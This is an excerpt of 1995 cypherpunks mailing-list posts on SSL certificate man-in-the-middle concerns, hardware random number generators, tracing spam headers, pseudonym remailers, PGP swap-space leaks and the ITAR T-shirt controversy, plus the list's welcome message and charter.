Unfortunately a lot of currently issued certificates are non-compliant 
(even Verisign and netscape :-); any fully automated implementation needs 
a static table of hostnames aliases- interactive applications can 
display certificates for manual review.

> 
> You will need to get the 'filter' (MITM) key signed by Verisign.
> Or hack Verisign's server-key-signing key.

This is not really much protection. Getting hold of any key is much 
easier than getting a specific key, and don't forget there are a number 
of vulnerable keys floating around until their expiration dates pass. 

This attack has been known about for a long time, and is too obvious to 
be really interesting; I implemented a demonstration of the attack as 
part of developing a protection. If anybody is interested I can mail them my
report. 

The variant of the attack I implemented is useless for anything but 
demonstration purposes, or I'd ask sameer for a T-shirt. The external fix 
is a bit more useful, but there doesn't seem to be a patchnetscape alias :-)

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 30 Sep 95 16:41:12 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Simple Hardware RNG Idea
In-Reply-To: <ac9161a3050210040cbd@[205.199.118.202]>
Message-ID: <199509302340.TAA25393@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> 2. Incorporating Am-241 or other alpha emitters in microcurie levels would
> require licensing, regulatory oversight, etc., etc. Don't count on it.
> 
> 3. Data rates are fairly low. Anything that "clicks" at high rates (> 1K
> counts per second) would be too radioactive to ship.
> 
> 4. Zener diodes and other random noise sources are cheaper to build, more
> consistent in output, and easier to integrate into actual products.

However, radiation detection devices are far easier to assure correct
operation. You can buy pre-built radiation counters with RS-232
interfaces, so its really just a question in many cases of buying them
and small radation sources, the latter of which is available in most
scientific supply catalogs. Unlike other devices, its very hard for
outsiders to tamper with radation sources to make them produce
specially skewed numbers....

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dakidd@cris.com (Don Bruder)
Date: Sun, 1 Oct 95 07:06:58 PDT
Subject: Re: WHERE did this come from?
In-Reply-To: <44kgtb$88i@news.rain.org>
Message-ID: <dakidd-3009952034080001@192.0.2.1>
MIME-Version: 1.0
Content-Type: text/plain


In article <44kgtb$88i@news.rain.org>, rivaud@rain.org wrote:

:This is a multi-part message in MIME format.
:
:---------------------------------17921121372935
:Content-Transfer-Encoding: 7bit
:Content-Type: text/plain; charset=us-ascii
:
:Attatched to this is, (I hope), the header text from a unsolicited e-mail 
:message I received.  The return address does not work.  WHY? How can I 
:inform the sender that I hope to never receive there material again?
:
:I tried "reply-all" through Eudora, but my reply got bounced back to me 
:as undeliverable.
:
:I have removed the content of the original message. I don't know why it 
:was sent to me, but it contained material that I found offensive.
:
:Any help, or words of wisdom and enlightenment would be appreciated. 
:Information would be nice too.  
:
:Thanks.
:
:-------------header should be below here-------------- i hope...--------
:
:
:
:---------------------------------17921121372935
:Content-Transfer-Encoding: quoted-printable
:Content-Type: text/plain
:
:Return-Path: Crusader@national-alliance.org Received: from
asso.nis.garr.it (asso.nis.garr.it [192.12.192.10]) by coyote.rain.org (8=
:6.12/CSE) with SMTP id FAA20270; Sat, 30 Sep 1995 05:58:42 -0700 From:
Crusader@national-alliance.org
:Received: by asso.nis.garr.it (4.1/1.34/ABB950929)
:        id AA14320; Sat, 30 Sep 95 13:02:20 +0100 Received: by
mercury.sfsu.edu (5.0/SMI-SVR4) 
:        id AA21676; Sat, 30 Sep 95 03:43:27 -0700 Date: Sat, 30 Sep 95
03:43:27 -0700
:Message-Id: <91324721788@National-Alliance.org> Subject: The Long March 
:Apparently-To: Crusader@National-Alliance.org
:
:
:
:If you are concerned about the fate Western/American civiliztion and its
people, please take the time to read this artcle.

<Massive CHOP of utter garbage deleted>
 

Welcome to the club, guy... 

I found this drivel in my mailbox this morning too.

Here's the headers from mine, if anybody thinks it will help track these morons.

<Begin header block>
Return-Path: <Crusader@national-alliance.org>
Received: from asso.nis.garr.it by deathstar.cris.com [1-800-745-CRIS (voice)]
From: <Crusader@national-alliance.org>
Errors-To: Crusader@national-alliance.org
Received: by asso.nis.garr.it (4.1/1.34/ABB950929)
        id AA09169; Sat, 30 Sep 95 03:14:27 +0100
Received: by mercury.sfsu.edu (5.0/SMI-SVR4) 
        id AA21676; Fri, 29 Sep 95 19:23:27 -0700
Date: Fri, 29 Sep 95 19:23:27 -0700
Message-Id: <91324721846@National-Alliance.org>
Subject: The Long March 
Apparently-To: Crusader@National-Alliance.org
<end header block>

Looks to me like it originally gated into the mail-system at
mercury.sfsu.edu, wherever that is. From who is beyond my understanding.
Hopefully somebody can find out and let the apropriate people know so it
can be stopped from happening again.

I get enough junk in my paper mailbox without having to wade through it in
my email box!

-- 
+-------------------+ \__    Roadkill on the information superhighway...
|Don Bruder         | |  \       AUGH! +-------------------------------+
|dakidd@cris.com    | |_@_\____&   /   | I will choose a purpose clear:|
|I eat my roadkill! |_|____|__@|  @    | I will choose Free-will -Rush |
+/.\/.\--------+ /.\/.\=(__)/.\] \|/   +-------------------------------+
_\_/\_/__________\_/\_/_____\_/__/_\__     Finger for PGP public key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rivaud@rain.org
Date: Sun, 1 Oct 95 05:50:42 PDT
Subject: WHERE did this come from?
Message-ID: <44kgtb$88i@news.rain.org>
MIME-Version: 1.0
Content-Type: text/plain

Attatched to this is, (I hope), the header text from a unsolicited e-mail 
message I received.  The return address does not work.  WHY? How can I 
inform the sender that I hope to never receive there material again?

I tried "reply-all" through Eudora, but my reply got bounced back to me 
as undeliverable.

I have removed the content of the original message. I don't know why it 
was sent to me, but it contained material that I found offensive.

Any help, or words of wisdom and enlightenment would be appreciated. 
Information would be nice too.  

Thanks.

-------------header should be below here-------------- i hope...--------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rivaud@rain.org
Date: Sun, 1 Oct 95 06:16:21 PDT
Subject: Re: WHERE did this come from?
In-Reply-To: <44kgtb$88i@news.rain.org>
Message-ID: <44kh2m$8sa@news.rain.org>
MIME-Version: 1.0
Content-Type: text/plain


OK, I screwed up.  Sorry to take up all the space with the text of it.

But, whether you agree with it or not, if you know from whence it came 
and how they sent it, I would like to know.  

Thanks again.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 30 Sep 95 19:44:08 PDT
To: tcmay@got.net>
Subject: Re: "Notes" to be Eclipsed by "Netscape"
Message-ID: <9510010242.AA06388@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> I've seen Notes running ...
> but my access to it was only marginal.
> But, knowing the software, it wouldn't surprise me if there were 
> some serious bugs in the security code.

Er, sounds to me like you're leaping to some conclusions...

At any rate, one of the designers of Notes's security was Charlie Kaufman
(formerly of Digital, recent author of a security book mentioned here) and
he is No Slouch.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbass@dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 21:46:56 PDT
To: Eric Murray <ericm@lne.com>
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9510010446.AA11983@dmsd.com>
MIME-Version: 1.0
Content-Type: text/plain


> BTW your 'offer' is silly- this is not a trivial amount of work, and you
> would not deserve any credit for coming up with so ordinary an
> attack.  Write the code yourself, or pay the market rate for it.
> -- 
> Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm

So is the Tee Shirt offer, and so is cracking the RSA public key
algorithm ... the point is that at least two teams did it.

My offer is trival in $$'s I agree, but the challenge I offer is to
focus on the weaknesses of SSL rather than it's strengths (large keys).
I suspect this is easier than most people think, so maybe I should
offer a Tee Shirt instead?

I suspect the certificates can be attacked in one of several ways.

The most likely is that the filter can use the servers certificate and fake,
forge, or simply subsititue a valid one in the filters name for the client.
This might mean that the filter has to become a trusted server as well.
I don't see any problems with the filter playing client to the server
given the SSL protocol.

Another is since the clients are often distributed
over the net, that another filter is installed recognize clients and alter
them on the fly to avoid the client/filter problem in the future.

Another tack is based on getting very close to the server (in a bridge or
router in the direct path to the server) in which the filter might acutally
be able to get the get valid certificates signed in the servers name, while
eating the real requests.

The reality is that all three parties are strangers, and I have had doubts
about the very nature of certificates & public key in this case.

John Bass
DMS Design





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Don.Stephenson@Eng.Sun.COM (Don Stephenson)
Date: Sat, 30 Sep 95 23:16:29 PDT
To: ses@tipper.oit.unc.edu
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9510010614.AA08538@icenine.Eng.Sun.COM>
MIME-Version: 1.0
Content-Type: text/plain



> From ses@tipper.oit.unc.edu Sat Sep 30 20:43:51 1995

> My currently recommended approach is to enforce the verisign requirement 
> that all valid hostnames for the server be included in the certificate as 
> CN values. This allows the check to be made below the application layer. 
> Unfortunately a lot of currently issued certificates are non-compliant 
> (even Verisign and netscape :-); any fully automated implementation needs 
> a static table of hostnames aliases- interactive applications can 
> display certificates for manual review.

I don't think binding hostnames to certificates helps much because 
both hostnames and IP addresses can be spoofed and DNS servers can be 
subverted.  The important thing is the binding to the "service" name or 
definition (e.g. InterState online banking service).


> This is not really much protection. Getting hold of any key is much 
> easier than getting a specific key, and don't forget there are a number 
> of vulnerable keys floating around until their expiration dates pass. 

Well of course, if the secret key of the server (or worse yet, certificate 
authority) is compromised, all bets are off.  That's true of just about any 
protocol you can dream up.

Are you just referring to the problem of accurate and up to date certificate 
revocation lists (CRL) being available ?

If so, you're right, this is a very difficult problem to solve without 
having a truly reliable and pervasive key-distribution & CRL system 
deployed throughout the world.

- Don







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@skypoint.com
Date: Sat, 30 Sep 95 21:18:11 PDT
To: cypherpunks@toad.com
Subject: Digests No Longer Available
Message-ID: <m0szFpk-0005HSC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Due to some personal issues, I am being forced to cut back my net 
involvement. Cypherpunks and its digests are a causality of this. 
Effective immediately I will no longer be keeping digests of the 
list.  Hopefully in a few months I'll be back.

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Thu, 26 Oct 1995 19:37:33 +0800
To: cypherpunks@toad.com
Subject: Linux security issues
Message-ID: <199510260304.VAA00205@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


 
Has anyone heard of any information on the Linux swap partition,
for example, if it does me the favor of storing my pgp passphrase?
 
Anyone who's interested in compiling PGP under ELF, add ASMDEF="-DSYSV"
to the end of their linux make line.

Don




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@toad.com
Date: Thu, 26 Oct 1995 14:00:11 +0800
To: cypher@infinity.nus.sg
Subject: Your Majordomo request results
Message-ID: <9510260555.AA10275@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


--

Your request of Majordomo was:
>>>> subscribe cypherpunks cypher@infinity.nus.sg
Succeeded.
Your request of Majordomo was:
>>>> end
END OF COMMANDS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@toad.com
Date: Thu, 26 Oct 1995 14:02:09 +0800
To: cypher@infinity.nus.sg
Subject: Welcome to cypherpunks
Message-ID: <9510260555.AA10276@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


--

Welcome to the cypherpunks mailing list!

If you ever want to remove yourself from this mailing list,
you can send mail to "Majordomo@toad.com" with the following command
in the body of your email message:

    unsubscribe cypherpunks cypher@infinity.nus.sg

Here's the general information for the list you've
subscribed to, in case you don't already have it:



About cypherpunks
-----------------

I. Administrivia (please read, boring though it may be)

The cypherpunks list is a forum for discussing personal defenses for
privacy in the digital domain.  It is a high volume mailing list.  If
you don't know how to do something, like unsubscribe, send mail to

	majordomo@toad.com

and the software robot which answers that address will send you back
instructions on how to do what you want.  If you don't know the
majordomo syntax, an empty message to this address will get you a help
file, as will a command 'help' in the body.  Even with all this
automated help, you may still encounter problems.  If you get really
stuck, please feel free to contact me directly at the address I use
for mailing list management:

	cypherpunks-owner@toad.com

Please use this address for all mailing list management issues.  Hint:
if you try to unsubscribe yourself from a different account than you
signed up for, it likely won't work.  Log back into your old account
and try again.  If you no longer have access to that account, mail me
at the list management address above.

For other questions, my list management address is not the best place,
since I don't read it every day.  To reach me otherwise, send mail to

	eric@remailer.net

This address is appropriate for emergencies (and wanting to get off
the list is never an emergency), such as the list continuously spewing
articles.  Please don't send me mail to my regular mailbox asking to
be removed; I'll just send you back a form letter.

Do not mail to the whole list asking to be removed.  It's rude.  The
-request address is made exactly for this purpose.

To post to the whole list, send mail to

	cypherpunks@toad.com

If your mail bounces repeatedly, you will be removed from the list.
Nothing personal, but I have to look at all the bounce messages.

There is no digest version available.

There is an announcements list which is moderated and has low volume.
Announcements for physical cypherpunks meetings, new software and
important developments will be posted there.  Mail to

	cypherpunks-announce-request@toad.com

if you want to be added or removed to the announce list.  All
announcements also go out to the full cypherpunks list, so there is no
need to subscribe to both.


II. About cypherpunks

The cypherpunks list is not designed for beginners, although they are
welcome.  If you are totally new to crypto, please get and read the
crypto FAQ referenced below.  This document is a good introduction,
although not short.  Crypto is a subtle field and a good understanding
will not come without some study.  Please, as a courtesy to all, do
some reading to make sure that your question is not already frequently
asked.

There are other forums to use on the subject of cryptography.  The
Usenet group sci.crypt deals with technical cryptography; cypherpunks
deals with technical details but slants the discussion toward their
social implications.  The Usenet group talk.politics.crypto, as is
says, is for political theorizing, and cypherpunks gets its share of
that, but cypherpunks is all pro-crypto; the debates on this list are
about how to best get crypto out there.  The Usenet group
alt.security.pgp is a pgp-specific group, and questions about pgp as
such are likely better asked there than here.  Ditto for
alt.security.ripem.

The cypherpunks list has its very own net.loon, a fellow named L.
Detweiler.  The history is too long for here, but he thinks that
cypherpunks are evil incarnate.  If you see a densely worded rant
featuring characteristic words such as "medusa", "pseudospoofing",
"treachery", "poison", or "black lies", it's probably him, no matter
what the From: line says.  The policy is to ignore these postings.
Replies have never, ever, not even once resulted in anything
constructive and usually create huge flamewars on the list.  Please,
please, don't feed the animals.


III. Resources.

A. The sci.crypt FAQ

anonymous ftp to rtfm.mit.edu:pub/usenet-by-group/sci.crypt

The cryptography FAQ is good online intro to crypto.  Very much worth
reading.  Last I looked, it was in ten parts.

B. cypherpunks ftp site

anonymous ftp to ftp.csua.berkeley.edu:pub/cypherpunks

This site contains code, information, rants, and other miscellany.
There is a glossary there that all new members should download and
read.  Also recommended for all users are Hal Finney's instructions on
how to use the anonymous remailer system; the remailer sources are
there for the perl-literate.

C. Bruce Schneier's _Applied Cryptography_, published by Wiley

This is required reading for any serious technical cypherpunk.  An
excellent overview of the field, it describes many of the basic
algorithms and protocols with their mathematical descriptions.  Some
of the stuff at the edges of the scope of the book is a little
incomplete, so short descriptions in here should lead to library
research for the latest papers, or to the list for the current
thinking.  All in all, a solid and valuable book.  It's even got
the cypherpunks-request address.


IV. Famous last words

My preferred email address for list maintenance topics only is
hughes@toad.com.  All other mail, including emergency mail, should go
to hughes@ah.com, where I read mail much more regularly.

Enjoy and deploy.

Eric

-----------------------------------------------------------------------------

Cypherpunks assume privacy is a good thing and wish there were more
of it.  Cypherpunks acknowledge that those who want privacy must
create it for themselves and not expect governments, corporations, or
other large, faceless organizations to grant them privacy out of
beneficence.  Cypherpunks know that people have been creating their
own privacy for centuries with whispers, envelopes, closed doors, and
couriers.  Cypherpunks do not seek to prevent other people from
speaking about their experiences or their opinions.

The most important means to the defense of privacy is encryption. To
encrypt is to indicate the desire for privacy.  But to encrypt with
weak cryptography is to indicate not too much desire for privacy.
Cypherpunks hope that all people desiring privacy will learn how best
to defend it.

Cypherpunks are therefore devoted to cryptography.  Cypherpunks wish
to learn about it, to teach it, to implement it, and to make more of
it.  Cypherpunks know that cryptographic protocols make social
structures.  Cypherpunks know how to attack a system and how to
defend it.  Cypherpunks know just how hard it is to make good
cryptosystems.

Cypherpunks love to practice.  They love to play with public key
cryptography.  They love to play with anonymous and pseudonymous mail
forwarding and delivery.  They love to play with DC-nets.  They love
to play with secure communications of all kinds.

Cypherpunks write code.  They know that someone has to write code to
defend privacy, and since it's their privacy, they're going to write
it.  Cypherpunks publish their code so that their fellow cypherpunks
may practice and play with it.  Cypherpunks realize that security is
not built in a day and are patient with incremental progress.

Cypherpunks don't care if you don't like the software they write. 
Cypherpunks know that software can't be destroyed.  Cypherpunks know
that a widely dispersed system can't be shut down.

Cypherpunks will make the networks safe for privacy.

[Last updated Mon Feb 21 13:18:25 1994]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Thu, 26 Oct 1995 21:25:33 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <acb4d26a0e021004987b@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 3:35 PM 10/23/95, Futplex wrote:
>Lance Cottrell writes:
>> I think one solution to this problem is to encourage (require) the use of
>> pseudonym servers. Having a server like alpha as the entity on the from
>> line has several advantages.
>>
>> 1) Less Spam since it takes some effort to set up the nym and it will be
>> taken away as soon as the spam starts.
>
>I fear this will be a short-lived gain. User-friendly scripts for
>establishing pseudonymous accounts are pretty easy to write. They may be
>beyond the average Fast Money Maker, but I expect myself and others will be
>putting them out on the Net for general consumption.

One need not automate the process of setting up anonymous accounts. One
might also require some sort of exchange before activating the nym to
verify that the return address is working.

<SNIP>
>Semi-permanent account status confers privileges to the user, IMHO. I
>believe a pseudonymous account ideally should be treated the same as a
>regular account on an ISP. For example, an admin will not unilaterally close
>an account upon receiving a single complaint about the account user.
>Certainly I don't know of an ISP that routinely blocks its users' accounts
>from sending mail to selected other accounts. Lest I seem too presumptuous,
>let me say that I realize all immediately foreseeable pseudonymizers are
>free services. Clearly these service providers can set whatever policies they
>wish, and are not directly competing with the fee-charging ISPs. Perhaps
>future fee-charging pseudonymizers will consider these criteria in offering
>enhanced services.
>
>-Futplex <futplex@pseudonym.com>

I agree. With both free and for-fee nym servers must clearly spell out what
actions will result in the termination of the nym. Perhaps 1 spam, 1
systematic harassment, or more than 5 serious complaints per month. Obvious
this would need to be tuned to preserve free speech while allowing abusers
to be quickly squelched. I would imagine an ecology of these servers would
develop with some short lived permissive servers mixed with long lived more
restrictive ones.

        -Lance


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMI8kEfPzr81BVjMVAQF3QAgAh+Q03VU3b69uQqylri/S2EJvfS5MqQ4V
JRTZRu8ZQTjb7Ic6KowQXogXG0yAv/GUa6jEWup+fO1omR2t/s7AtXjcFC6du1hh
iwSeRw1QVtyspDu6FHAJNL98uG3b0taSHJxfAueA4CA8lZm00vP1exM1A0ndPjXN
6/oM/O5xdUET2tanlpcW2WDdVOZDDGQGvMORlrG8WmJKWebmcg9GnrE5gyZLs3Wr
ijze7CccyPLnET4dZiry9Qd/NRx2hgdfkDopTNiTbvmGCXulzqBpqSZ689KDITAK
MNgSagZKgOsy7pRGCFSK9EPljZ2IwPtCrE/s9YX0kkJtDhq84SU3EQ==
=UBy5
-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Thu, 26 Oct 1995 14:20:32 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <acb4d4fe0f02100433de@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


>Lance Cottrell writes:
>> If all nym servers were standardized to run from the same account name
>> (nymserve for example) the remailers could be configured to only deliver
>> final hops to addresses with that username.
>
>A detail I missed before: the remailers used in pseudonym reply blocks must
>somehow deliver replies to the True Name (verinymous ?) address of the holder
>of the pseudonym. I suppose they could all finally be routed to the
>pseudonymizer, which would deliver the messages directly to the intended
>recipient (holder of the pseudonym).
>
>-Futplex <futplex@pseudonym.com>


They could also end up getting dumped in a message pool. Perhaps all (or most)
nym servers could operate mailing list message pools. Anyone could
subscribe to the pool, and any nym could have its mail directed to that
pool. It should not be too difficult to rig a procmail script to try to
decrypt all mail from that list, and deliver those that could be decrypted.

        -Lance


----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Thu, 26 Oct 1995 14:21:19 +0800
To: sameer <cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <acb4d64d11021004827b@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

How open is the protocol? Is there and API for it? Does anyone know how big
the coins are? There will have to be room for one per header in Mixmaster.
Do they vary in size, or are all coins identical? There is so much stuff to
try to keep track of all at once! :/

        -Lance (going down in a blaze of questions) Cottrell


At 5:20 PM 10/23/95, sameer wrote:
>        With the release of digicash I hope that we can soon make this
>stuff for-pay and much of the spam problem will be fixed. (Not all of
>it, of course.)
>        (I am rather hesitatnt to setup an account with Mark Twain
>though.. $2,500 min balance and not FDIC insured?)
>
>
<SNIP>

        -Lance
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMI8m5fPzr81BVjMVAQFXUAgAxNhdCxBCRJPLfbgIihe3OLjmnlggfjIQ
lgNIf50DoGtiighGMCzvFYRChqYCJfhZKLJOp1uTOtqe6v/y7ybNk4tTUFR9DWwV
HKO0orhdlUuaxBIm4QXtKBGjHa5effgelWfUuKrwt7Bd4x+SF7fY7MEq549Ujbz1
J+DoRnjadeoHYbZYQ7TlCbiuEofuvVZfTWgkBIx1rbQgYxF7Hr8sHlP+TnVcGSv9
NkHvkwbd7ZQ8hMmIvGQtWAXQjeNmCQpd4ZJO82Fb9pw11RADVL8JfFO9ru6sbyOU
/b1lIvB38APSRA4Ova6I9mmiHAjQPegZKuTgtAM7TDy3vJXRxGNS+Q==
=7BTM
-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 26 Oct 1995 14:38:13 +0800
To: cypherpunks@toad.com
Subject: [Noise] Paranoia in the Comics
Message-ID: <199510260626.XAA04340@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


This has no real crypto relevence, but some anarchistic relevence.

Sometimes you find anti-government paranoia in the strangest of places...
In the Ziggy strip for 10/25/95, Ziggy is in a Psychiatrist's office.  The
shrink is stating "You're afraid of the government, are you?  I'm required
to report that sort of thing you know."

You can tell the state of distrust of the state when you see such things in
a generally bland and spineless strip like Ziggy.  What next? Little Billy
from Family Circus bringing home a copy of the Anarchists Cookbook?  Charlie
Brown getting his phone tapped by Louie Freeh?  Garfield joining the EFF?
The mind boggles...
|       Visualize a world without lawyers!        | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 26 Oct 1995 14:45:30 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
In-Reply-To: <acb323bd030210041822@[205.199.118.202]>
Message-ID: <308F2B18.6BDA@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin wrote:
> 
> I agree strongly with Tim May that this (fun) little joke has gone far
> enough.  I enjoyed it while it lasted, but the CJR was clearly frivolous,
> the T-Shirt was clearly not a munition, IMHO, and that's that.  Write up
> the experience, post it on the web somewhere (I'll provide a space if you
> need it), and call it a day.

  Should they also reject the same content (RSA-PERL) delivered
in any of the following ways:

	Printed on paper
	Printed on paper in OCR font
	Printed on paper in barcode
	Printed on paper with magnetic ink (like checks)

  The lines being drawn here seem very arbitrary.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 26 Oct 1995 15:14:02 +0800
To: loki@obscura.com (Lance Cottrell)
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <acb4d64d11021004827b@[137.110.24.250]>
Message-ID: <199510260659.XAA18815@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Heh. See suggestion #1 in the Hack Digicash
promotion. "Reverse-engineer the protocol." The protocol is unknown, I
don't even know the format of the coins. I am sending in my account
application tomorrow.
	(i should sub to that nyms list.. majordomo?)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Thu, 26 Oct 1995 14:37:35 +0800
To: don@cs.byu.edu
Subject: Re: Linux security issues
In-Reply-To: <199510260304.VAA00205@wero.byu.edu>
Message-ID: <Pine.SUN.3.90.951026011633.3314A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


	 I dont see what this has to do with Linux. The question should
be does the PGP pass phrase ever apper in a swap partition/file.
Well the swap space is an extention of memory, forming part of the 
virtual memory system. Obisouly PGP needs to read the passphrase into memory.
And Iam sure is goes out of it way to not keep it there for long. But on 
a loaded system PGP might get swaped out the moment it reads the passphrase.
Further more if the system happens to crash at that instant the 
passphrase will be keept in the swap space. But this is true for any piece 
of memory, PGP passphrase, or not.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Wed, 25 Oct 1995 don@cs.byu.edu wrote:

> Has anyone heard of any information on the Linux swap partition,
> for example, if it does me the favor of storing my pgp passphrase?
>  
> Anyone who's interested in compiling PGP under ELF, add ASMDEF="-DSYSV"
> to the end of their linux make line.
> 
> Don
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 26 Oct 1995 17:31:40 +0800
To: Mark <mark@lochard.com.au>
Subject: Re: Mandatory ID in California?
In-Reply-To: <199510260643.AA26567@junkers.lochard.com.au>
Message-ID: <Pine.ULT.3.91.951026020632.27266W-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Oct 1995, Mark wrote:

> >"States may not authorize arrest...for failing to produce identification..."
> >       Kolender v. Lawson 461 U.S. 352 (1983)
> >
> >"...may not compel an answer and they must allow the person to leave 
> >after a reasonable brief period of time...."  - - ibid
> 
> How about INS coming into the equation?  Do they have additional powers 
> which let them put your butt in a bad imitation of a farday cage?

The powers of the INS have been the subject of much litigation. I used to
study immigration law and policy, but that part of my brain has fallen
into disuse in the last five years. I could probably dig up some
references from old papers, though. I believe the INS has its own special
definitions of probable cause. 

Section 10 of Proposition 187, which was passed by the ever-so-enlightened
people of California last November, empowers the police to incarcerate
without charge anyone who can not produce the two forms of identification
required to prove legal residence. Fortunately, 187 is so Unconstitutional
on its face that multiple injunctions against the enforcement of every one
of provisions were ordered within 30 minutes of 187's receiving the
Governor's signature. 

Today, many jurisdictions in California prohibit state & local officials
from turning people over to the INS. It's not good for public health and
safety for the alleged illegal people to be afraid to call the cops, or a
doctor. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Thu, 26 Oct 1995 15:14:35 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <v02120d06acb4ee63f448@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 11:30 PM 10/25/95, Jeff Weinstein wrote:

>  Should they also reject the same content (RSA-PERL) delivered
>in any of the following ways:
>
>        Printed on paper
>        Printed on paper in OCR font
>        Printed on paper in barcode
>        Printed on paper with magnetic ink (like checks)
>
>  The lines being drawn here seem very arbitrary.

        FWIW, in principle I agree with Michael and Tim: 90% of the point
of the lark was the absurdity of a T-shirt being a "munition." OTOH, the
arbitrariness of ITAR enforcement--regardless of the form of the CJRs
filed--is very troubling. When the USG so selectively enforces federal law,
one has to wonder what criterion is informing the selection. And this
"little" adventure could (IANAL, etc.) have a bright side: if the CJR were
submitted in a verifiable way (courier, certified, etc.) and the agency in
question had documentably refused to examine the materials submitted or to
take the application seriously, wouldn't this weaken any subsequent effort
to prosecute in another, more practical case involving the same code? If
so, maybe something halfway between a T-shirt and a book--y'all can figure
out what--encoded with machine-readable source for PGP might be in order.
